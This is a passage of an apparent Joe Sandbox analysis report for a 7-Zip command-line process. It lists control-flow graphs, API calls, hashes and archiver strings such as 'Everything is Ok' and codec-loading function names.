2866->2870 2871 f87413-f87425 free 2866->2871 2868->2788 2877 f8768a 2869->2877 2874 f8740a-f87411 2870->2874 2875 f873dc-f873de 2870->2875 2871->2788 2874->2854 2878 f873e0-f873f0 free 2875->2878 2879 f873f5-f87405 free 2875->2879 2877->2863 2878->2788 2879->2788 2880->2788 2881->2788
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: Cannot create file with auto name$Cannot delete output file$Cannot delete output folder$Cannot rename existing file
                              • API String ID: 1294909896-3443351061
                              • Opcode ID: 7015291d19cea9615b8cd146ea9ca66bc542f039213e21b23768e11c5d6aef03
                              • Instruction ID: c9154ff847047c027d5b722fa7991a14c0b7389501716193e25d0601920706b3
                              • Opcode Fuzzy Hash: 7015291d19cea9615b8cd146ea9ca66bc542f039213e21b23768e11c5d6aef03
                              • Instruction Fuzzy Hash: 92A1926321CB8582DB60FB25E8913EEB361F7C5790F644122EB8E8B619DE6DC845F701

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2882 fc3c48-fc3c79 2883 fc3f9f 2882->2883 2884 fc3c7f 2882->2884 2885 fc3fa1-fc3fb4 2883->2885 2886 fc3c82-fc3cbe fputs call fc2ad0 2884->2886 2889 fc3cc0-fc3cc4 2886->2889 2890 fc3d12-fc3d16 2886->2890 2893 fc3cc6-fc3cde fputs call f724c4 2889->2893 2894 fc3ce0-fc3d0d call f735b8 call fc2d88 free 2889->2894 2891 fc3d18-fc3d1f 2890->2891 2892 fc3d21-fc3d2c 2890->2892 2897 fc3d30-fc3d58 call fc2ad0 call fc2e04 2891->2897 2892->2897 2893->2890 2894->2890 2906 fc3d8d-fc3da4 call fc2cf0 2897->2906 2907 fc3d5a-fc3d88 fputs * 2 call f725dc call f724c4 2897->2907 2906->2885 2913 fc3daa-fc3db1 2906->2913 2907->2906 2914 fc3de6-fc3df6 2913->2914 2915 fc3db3-fc3de1 fputs * 2 call f7263c call f724c4 2913->2915 2914->2885 2920 fc3dfc-fc3e02 2914->2920 2915->2914 2921 fc3e69-fc3e73 2920->2921 2922 fc3e04-fc3e33 2920->2922 2923 fc3e79-fc3e9a fputs 2921->2923 2924 fc3f54-fc3f68 2921->2924 2927 fc3e39-fc3e49 call fc2cf0 2922->2927 2928 fc3f70 2922->2928 2923->2924 2932 fc3ea0-fc3eb3 2923->2932 2924->2886 2926 fc3f6e 2924->2926 2926->2883 2933 fc3e4e-fc3e50 2927->2933 2931 fc3f74-fc3f81 SysFreeString 2928->2931 2931->2885 2932->2924 2934 fc3eb9-fc3eea 2932->2934 2935 fc3e56-fc3e67 SysFreeString 2933->2935 2936 fc3f72 2933->2936 2938 fc3ef0-fc3f19 2934->2938 2939 fc3f83 2934->2939 2935->2921 2935->2922 2936->2931 2942 fc3f1b-fc3f4e call fc2b78 call f7be6c SysFreeString 2938->2942 2943 fc3f85-fc3f8f call f7be6c 2938->2943 2940 fc3f90-fc3f9d SysFreeString 2939->2940 2940->2885 2942->2924 2942->2934 2943->2940
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$FreeString$fputcfree
                              • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                              • API String ID: 2701146716-1919703766
                              • Opcode ID: 5777e09c41b7440bff6cea8e59cbf97792d8b106f0deddf715476f13273d11e4
                              • Instruction ID: 04a3ffbc9260fe1ff1d1da34ba99093c58e4045e80ba3829f5c8e5dd2b978b9a
                              • Opcode Fuzzy Hash: 5777e09c41b7440bff6cea8e59cbf97792d8b106f0deddf715476f13273d11e4
                              • Instruction Fuzzy Hash: 71914B36614A4682CB54DF26EA55B6E7331F785BD4F40902BEE4E47B28DF38C949E700

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2950 fca6e3-fca6ef 2951 fca736-fca73e 2950->2951 2952 fca6f1-fca6f9 2950->2952 2954 fca790-fca798 2951->2954 2955 fca740-fca742 2951->2955 2952->2951 2953 fca6fb-fca72f call f724c4 fputs call f7263c call f724c4 2952->2953 2953->2951 2957 fca79b-fca7a9 2954->2957 2958 fca778-fca781 2955->2958 2959 fca744-fca773 call f724c4 fputs call f7263c call f724c4 2955->2959 2962 fca7dc-fca7f8 free 2957->2962 2963 fca7ab 2957->2963 2958->2957 2959->2958 2967 fca7fa 2962->2967 2968 fca82b-fca850 free 2962->2968 2966 fca7af-fca7c5 2963->2966 2972 fca7d7-fca7da 2966->2972 2973 fca7c7-fca7d2 free * 2 2966->2973 2974 fca7fe-fca814 2967->2974 2976 fca860-fca863 2968->2976 2977 fca852-fca859 2968->2977 2972->2962 2972->2966 2973->2972 2979 fca826-fca829 2974->2979 2980 fca816-fca821 free * 2 2974->2980 2983 fca865-fca881 _CxxThrowException 2976->2983 2984 fca882-fca89d free 2976->2984 2977->2976 2982 fca85b 2977->2982 2979->2968 2979->2974 2980->2979 2986 fca85b call fc6550 2982->2986 2983->2984 2987 fca8bd-fca8dc free call fa8b60 call fc738c 2984->2987 2988 fca89f 2984->2988 2986->2976 2993 fca8e1-fca918 free call f71874 call fc7ec8 2987->2993 2989 fca8a3-fca8bb free 2988->2989 2989->2987 2989->2989 2998 fca94a-fca96b free 2993->2998 2999 fca91a 2993->2999 3000 fca91e-fca934 2999->3000 3001 fca946-fca948 3000->3001 3002 fca936-fca941 free * 2 3000->3002 3001->2998 3001->3000 3002->3001
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$fputs$ExceptionThrowfputc
                              • String ID: Errors: $Warnings:
                              • API String ID: 437615013-2345102087
                              • Opcode ID: 668692734a17d19e7b2f0b9b2458cdc2a1662e5a478cecb4249052460f7108dc
                              • Instruction ID: 8f8469ebe4b98e2a53faa5735a3fb2f58a8128643813e26d9ff6aeea7a7f20ea
                              • Opcode Fuzzy Hash: 668692734a17d19e7b2f0b9b2458cdc2a1662e5a478cecb4249052460f7108dc
                              • Instruction Fuzzy Hash: 3C51F9167046CA81DAB0EB25ED927AD7321FBC1BA4F448127CA8D07B59CF3DC842A712

                              Control-flow Graph

                              • Executed
                              • Not Executed
                               control_flow_graph 3003 fa9944-fa997a 3004 fa99a9-fa99b7 3003->3004 3005 fa997c 3003->3005 3007 fa99b9 3004->3007 3008 fa99ef-fa9a11 3004->3008 3006 fa9980-fa9992 3005->3006 3012 fa99a4-fa99a7 3006->3012 3013 fa9994-fa999f call fa1784 free 3006->3013 3009 fa99bd-fa99cf 3007->3009 3010 fa9c87-fa9cce call fa70ac call f73504 call fa93b8 free 3008->3010 3011 fa9a17 3008->3011 3014 fa99ea-fa99ed 3009->3014 3015 fa99d1-fa99e5 free * 3 3009->3015 3031 fa9cd0 3010->3031 3032 fa9cd5-fa9cdd 3010->3032 3016 fa9a1e-fa9ad4 call f7354c call f738a8 call f7354c * 2 3011->3016 3012->3004 3012->3006 3013->3012 3014->3008 3014->3009 3015->3014 3041 fa9ae0-fa9ae7 3016->3041 3042 fa9ad6-fa9adb call f738a8 3016->3042 3033 fa9de7-fa9e06 free 3031->3033 3034 fa9cef-fa9d20 call f73504 call fa96f8 free 3032->3034 3035 fa9cdf-fa9cea call f73730 3032->3035 3051 fa9d22 3034->3051 3052 fa9d27-fa9d44 call f73504 call fa96f8 3034->3052 3035->3034 3043 fa9ae9-fa9af1 call f738a8 3041->3043 3044 fa9af6-fa9b55 call fa8580 free * 2 3041->3044 3042->3041 3043->3044 3053 fa9b71-fa9b75 3044->3053 3054 fa9b57-fa9b6c call fa8798 3044->3054 3051->3033 3065 fa9d49-fa9d58 free 3052->3065 3057 fa9b7b-fa9b98 call fb5a44 call f72350 3053->3057 3058 fa9c23-fa9c41 call fb5a44 call f72350 3053->3058 3054->3058 3079 fa9b9a-fa9ba1 3057->3079 3080 fa9ba3 3057->3080 3076 fa9c43-fa9c53 call fa18a8 3058->3076 3077 fa9c55 3058->3077 3068 fa9d5a 3065->3068 3069 fa9d5f-fa9d69 3065->3069 3068->3033 3071 fa9d6b-fa9d6f 3069->3071 3072 fa9d71-fa9d74 3069->3072 3075 fa9d83-fa9d87 3071->3075 3072->3075 3078 fa9d76-fa9d7d 3072->3078 3084 fa9d89-fa9d8f 3075->3084 3085 fa9dd0-fa9de4 call fa7d18 3075->3085 3086 fa9c58-fa9c81 call fa1784 3076->3086 3077->3086 3078->3075 3083 fa9d7f 3078->3083 3081 fa9ba6-fa9bd1 3079->3081 3080->3081 3087 fa9c03-fa9c06 3081->3087 3088 fa9bd3-fa9bd9 3081->3088 3083->3075 3084->3085 3090 fa9d91 3084->3090 3085->3033 3086->3010 3086->3016 3098 fa9c08-fa9c19 memmove 3087->3098 3099 fa9c20 3087->3099 3094 fa9bdb-fa9be0 free 3088->3094 3095 fa9be7-fa9bf2 3088->3095 3096 fa9d94-fa9db3 GetProcAddress 3090->3096 3094->3095 3100 fa9c1b-fa9c1e 3095->3100 3101 fa9bf4-fa9bff call f72350 3095->3101 3102 fa9dbf-fa9dc8 3096->3102 3103 fa9db5-fa9dbd 3096->3103 3098->3058 3099->3058 3100->3058 3101->3087 3102->3096 3105 fa9dca 3102->3105 3103->3102 3108 fa9dcc-fa9dce 3103->3108 3105->3085 3108->3033
                              APIs
                              • free.MSVCRT ref: 00FA999F
                              • free.MSVCRT ref: 00FA99D5
                              • free.MSVCRT ref: 00FA99DD
                              • free.MSVCRT ref: 00FA99E5
                              • free.MSVCRT ref: 00FA9B16
                              • free.MSVCRT ref: 00FA9B21
                              • free.MSVCRT ref: 00FA9BDB
                              • memmove.MSVCRT(?), ref: 00FA9C11
                              • free.MSVCRT ref: 00FA9CC6
                              • free.MSVCRT ref: 00FA9DEC
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17B7
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17BF
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17CC
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA17F8
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1801
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1809
                                • Part of subcall function 00FA1784: free.MSVCRT ref: 00FA1816
                              • free.MSVCRT ref: 00FA9D18
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              • free.MSVCRT ref: 00FA9D50
                              • GetProcAddress.KERNEL32 ref: 00FA9DA6
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$AddressProc
                              • String ID: 7z.dll$Codecs$Formats$SetCodecs
                              • API String ID: 4053071709-3422688593
                              • Opcode ID: 9b75bb26663778e9c1f1fde4bbcc52b498a23a9330953f2d16202b641fe49834
                              • Instruction ID: da8b3cfb203682f8ef2a6feb087d7033602c0103b1b13c32a67cf6feb0da11e3
                              • Opcode Fuzzy Hash: 9b75bb26663778e9c1f1fde4bbcc52b498a23a9330953f2d16202b641fe49834
                              • Instruction Fuzzy Hash: F7C1D676608B8192CB60EB21E8803AFB760F386798F544126DBCE47B15CF7DD469E701

                              Control-flow Graph

                              • Executed
                              • Not Executed
                               control_flow_graph 3109 f9c0c8-f9c157 call f99be0 call f9bf1c memmove 3114 f9c159-f9c16d call f9c044 free 3109->3114 3115 f9c172-f9c185 3109->3115 3122 f9c53d-f9c550 3114->3122 3117 f9c18b 3115->3117 3118 f9c221-f9c22e call f9c044 3115->3118 3121 f9c18e-f9c1a2 3117->3121 3126 f9c230-f9c255 call f986a8 _CxxThrowException 3118->3126 3127 f9c256-f9c268 3118->3127 3124 f9c213-f9c21b 3121->3124 3125 f9c1a4-f9c1d6 call f98c88 call fb5a44 call f72350 3121->3125 3124->3118 3124->3121 3148 f9c1e8 3125->3148 3149 f9c1d8-f9c1e6 call f736a8 3125->3149 3126->3127 3131 f9c26a-f9c26d 3127->3131 3132 f9c2e7-f9c314 call fb51a8 3127->3132 3133 f9c26f-f9c2a7 call f7354c call f77544 call fb5a44 call f72350 3131->3133 3141 f9c342-f9c368 call f7dae0 3132->3141 3142 f9c316 3132->3142 3173 f9c2a9-f9c2b9 call f736a8 3133->3173 3174 f9c2bb 3133->3174 3157 f9c36a 3141->3157 3158 f9c396-f9c3ad call f7dae0 3141->3158 3145 f9c31a-f9c32b 3142->3145 3150 f9c33d-f9c340 3145->3150 3151 f9c32d-f9c338 free * 2 3145->3151 3156 f9c1eb-f9c20c free 3148->3156 3149->3156 3150->3141 3150->3145 3151->3150 3156->3124 3161 f9c36e-f9c37f 3157->3161 3168 f9c3b3-f9c3b6 3158->3168 3169 f9c4b6-f9c4cc free 3158->3169 3164 f9c391-f9c394 3161->3164 3165 f9c381-f9c38c free * 2 3161->3165 3164->3158 3164->3161 3165->3164 3170 f9c3b9-f9c3dc call f72350 3168->3170 3171 f9c4fc-f9c50a free 3169->3171 3172 f9c4ce 3169->3172 3187 f9c3ee 3170->3187 3188 f9c3de-f9c3ec call f736a8 3170->3188 3178 f9c50f-f9c51c 3171->3178 3176 f9c4d2-f9c4e5 3172->3176 3179 f9c2be-f9c2e5 free 3173->3179 3174->3179 3181 f9c4f7-f9c4fa 3176->3181 3182 f9c4e7-f9c4f2 free * 2 3176->3182 3184 f9c52e-f9c531 3178->3184 3185 f9c51e-f9c529 free * 2 3178->3185 3179->3132 3179->3133 3181->3171 3181->3176 3182->3181 3184->3178 3186 f9c533-f9c53b free 3184->3186 3185->3184 3186->3122 3190 f9c3f1-f9c42a call f72350 3187->3190 3188->3190 3194 f9c43c 3190->3194 3195 f9c42c-f9c43a call f736a8 3190->3195 3197 f9c43f-f9c452 3194->3197 3195->3197 3199 f9c470-f9c47e 3197->3199 3200 f9c454-f9c46e call f74ee4 3197->3200 3199->3170 3202 f9c484 3199->3202 3200->3199 3204 f9c486-f9c4b5 call f986a8 _CxxThrowException 3200->3204 3202->3169 3204->3169
                              APIs
                                • Part of subcall function 00F9BF1C: free.MSVCRT ref: 00F9BFDB
                              • memmove.MSVCRT ref: 00F9C14F
                              • free.MSVCRT ref: 00F9C166
                              • free.MSVCRT ref: 00F9C207
                              • _CxxThrowException.MSVCRT ref: 00F9C250
                              • free.MSVCRT ref: 00F9C2D9
                                • Part of subcall function 00F9C044: free.MSVCRT ref: 00F9C057
                                • Part of subcall function 00F9C044: free.MSVCRT ref: 00F9C072
                                • Part of subcall function 00F9C044: free.MSVCRT ref: 00F9C07B
                                • Part of subcall function 00F9C044: free.MSVCRT ref: 00F9C0A6
                                • Part of subcall function 00F9C044: free.MSVCRT ref: 00F9C0AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrowmemmove
                              • String ID: Cannot find archive$Duplicate archive path:
                              • API String ID: 3934437811-2067063536
                              • Opcode ID: 02ef01bc74011ba54d9a35827db376906c3ad96394d31a472ec9f7a70c779f66
                              • Instruction ID: 9056a762c956a731fc1a7e86749da8d3bbac95ea55ad2c47451e112314ed79b5
                              • Opcode Fuzzy Hash: 02ef01bc74011ba54d9a35827db376906c3ad96394d31a472ec9f7a70c779f66
                              • Instruction Fuzzy Hash: 49B1A372715A8582DF60EB16E89055EB3A1F7C5BD0F448512EE8E5BB28DF3CC942EB40

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3207 fa70ac-fa7101 call f76c8c call f73504 call f792d4 3214 fa7103-fa7130 call f73504 call f792d4 3207->3214 3215 fa7166 3207->3215 3214->3215 3229 fa7132-fa715f call f73504 call f792d4 3214->3229 3216 fa7169-fa716d 3215->3216 3219 fa716f-fa717c free 3216->3219 3220 fa717d-fa7181 3216->3220 3219->3220 3222 fa7183-fa7190 free 3220->3222 3223 fa7191-fa7195 3220->3223 3222->3223 3225 fa71a1-fa71a4 3223->3225 3226 fa7197-fa719c free 3223->3226 3227 fa71aa-fa71d2 call f7354c call fa6f74 3225->3227 3228 fa72d3-fa72eb call f736a8 free 3225->3228 3226->3225 3241 fa71ff-fa721c call fa6f74 3227->3241 3242 fa71d4-fa71fa call f736a8 free * 2 3227->3242 3238 fa72ee-fa72f5 3228->3238 3229->3215 3243 fa7161-fa7164 3229->3243 3248 fa7249-fa725f call fa6f74 3241->3248 3249 fa721e-fa7244 call f736a8 free * 2 3241->3249 3242->3238 3243->3216 3254 fa7289-fa729f call fa6f74 3248->3254 3255 fa7261-fa7287 call f736a8 free * 2 3248->3255 3249->3238 3260 fa72c9-fa72ce free 3254->3260 3261 fa72a1-fa72c7 call f736a8 free * 2 3254->3261 3255->3238 3260->3228 3261->3238
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: 7z.dll$Codecs$Formats$Path$Path64
                              • API String ID: 1534225298-3804457719
                              • Opcode ID: 0ee43319ccbabe998e43829a73327be4aef6bcdc6f0d81ad496a92ee476f1eae
                              • Instruction ID: 9be9b3a36f9096f11e3d0e21d80863c796329dc6893a44281685c187efaac148
                              • Opcode Fuzzy Hash: 0ee43319ccbabe998e43829a73327be4aef6bcdc6f0d81ad496a92ee476f1eae
                              • Instruction Fuzzy Hash: 8E51B66220870660DA60FB15EC51B6E7721D7C2BE4F845123BD8E477BACE3DC586EB11

                              Control-flow Graph for the function at fc0fe8-fc11fd (rendered graph not reproduced; legend: Executed / Not Executed)
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC100F
                              • fputs.MSVCRT ref: 00FC10A2
                              • LeaveCriticalSection.KERNEL32 ref: 00FC11DF
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              • fputs.MSVCRT ref: 00FC10E5
                                • Part of subcall function 00F7263C: fputs.MSVCRT ref: 00F7265D
                              • fputs.MSVCRT ref: 00FC1166
                              • fputs.MSVCRT ref: 00FC1185
                              • LeaveCriticalSection.KERNEL32 ref: 00FC11EC
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • free.MSVCRT ref: 00FC11AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                              • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                              • API String ID: 676172275-580504279
                              • Opcode ID: b8eea50c4c6cd9087f22b0f32f578737f81bfeb1d54a6a64280437262d46ebd7
                              • Instruction ID: 90f5133a8e668835235661638bdf062126b98a68716d2f98bf20e0554b964846
                              • Opcode Fuzzy Hash: b8eea50c4c6cd9087f22b0f32f578737f81bfeb1d54a6a64280437262d46ebd7
                              • Instruction Fuzzy Hash: 05518322700A82A2DB6DDF25DA917AC7325F746BA0F18812BCB1E47652CF3CD4B4E301

                              Control-flow Graph for the function at fb3616-fb3b8c (rendered graph not reproduced; legend: Executed / Not Executed)
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-3916222277
                              • Opcode ID: 5d5191459519a297f3b25da9133d6317b9fa33fcd80151dac8de26295ebe207b
                              • Instruction ID: d9f118af3153c6f9657cf127318a78c87327e5c0d7042e88f5363c260c26341b
                              • Opcode Fuzzy Hash: 5d5191459519a297f3b25da9133d6317b9fa33fcd80151dac8de26295ebe207b
                              • Instruction Fuzzy Hash: 70D17977209BC496CB61EB2AE49029EBB60F3C5B84F544016DB8E47B29CF7CC959DB10

                              Control-flow Graph for the function at fa93b8-fa966e (rendered graph not reproduced; legend: Executed / Not Executed)
                              APIs
                              • GetProcAddress.KERNEL32 ref: 00FA9543
                              • GetProcAddress.KERNEL32 ref: 00FA9564
                              • GetProcAddress.KERNEL32 ref: 00FA9587
                              • free.MSVCRT ref: 00FA9644
                              • GetLastError.KERNEL32 ref: 00FA9411
                                • Part of subcall function 00F76B80: FreeLibrary.KERNELBASE(?,?,?,00F76C03), ref: 00F76B91
                                • Part of subcall function 00FB5A44: _CxxThrowException.MSVCRT ref: 00FB5A74
                                • Part of subcall function 00FB5A44: memmove.MSVCRT ref: 00FB5AAD
                                • Part of subcall function 00FB5A44: free.MSVCRT ref: 00FB5AB5
                                • Part of subcall function 00F72350: malloc.MSVCRT ref: 00F72360
                                • Part of subcall function 00F72350: _CxxThrowException.MSVCRT ref: 00F7237B
                              • free.MSVCRT ref: 00FA9655
                              Strings
                              • CreateObject, xrefs: 00FA957C
                              • cannot load file as datafile library, xrefs: 00FA943B
                              • SetLargePageMode, xrefs: 00FA9538
                              • the module is not compatible with program, xrefs: 00FA9511
                              • SetCaseSensitive, xrefs: 00FA9559
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressProcfree$ExceptionThrow$ErrorFreeLastLibrarymallocmemmove
                              • String ID: CreateObject$SetCaseSensitive$SetLargePageMode$cannot load file as datafile library$the module is not compatible with program
                              • API String ID: 3132779546-1792956296
                              • Opcode ID: 63d204618bee00d17c5fe925bad3415d2d25ab2e0195b3636da510523415ed45
                              • Instruction ID: 5ebf7bc21863b6018e6e2fcffcd36df2dc26e29034dd617b2200b75ad0f5a103
                              • Opcode Fuzzy Hash: 63d204618bee00d17c5fe925bad3415d2d25ab2e0195b3636da510523415ed45
                              • Instruction Fuzzy Hash: 0E61F2A2704B4196DF14EF26D95436D33A0FB86BA4F4485369E4E87B51EF7CC866E300
                              APIs
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 00FA88E1
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 00FA88F6
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 00FA890B
                              • GetProcAddress.KERNEL32 ref: 00FA8936
                              • memmove.MSVCRT ref: 00FA8A59
                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 00FA8A8C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressProc$memmove
                              • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                              • API String ID: 2879976980-73314117
                              • Opcode ID: ea001d529e21fa486ba1d8765e8fb72d218ee3b8b902cfa8c72413175b78bef0
                              • Instruction ID: 74d2c35a450ff62f2e8f1dfde70b1650de3ba378ba39e3aed46280054596bdec
                              • Opcode Fuzzy Hash: ea001d529e21fa486ba1d8765e8fb72d218ee3b8b902cfa8c72413175b78bef0
                              • Instruction Fuzzy Hash: DB519073614A8096CB21DF14E8847AEB761F3857E4F510223EA8E87B68DFBCC946D740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrowfputcfputs
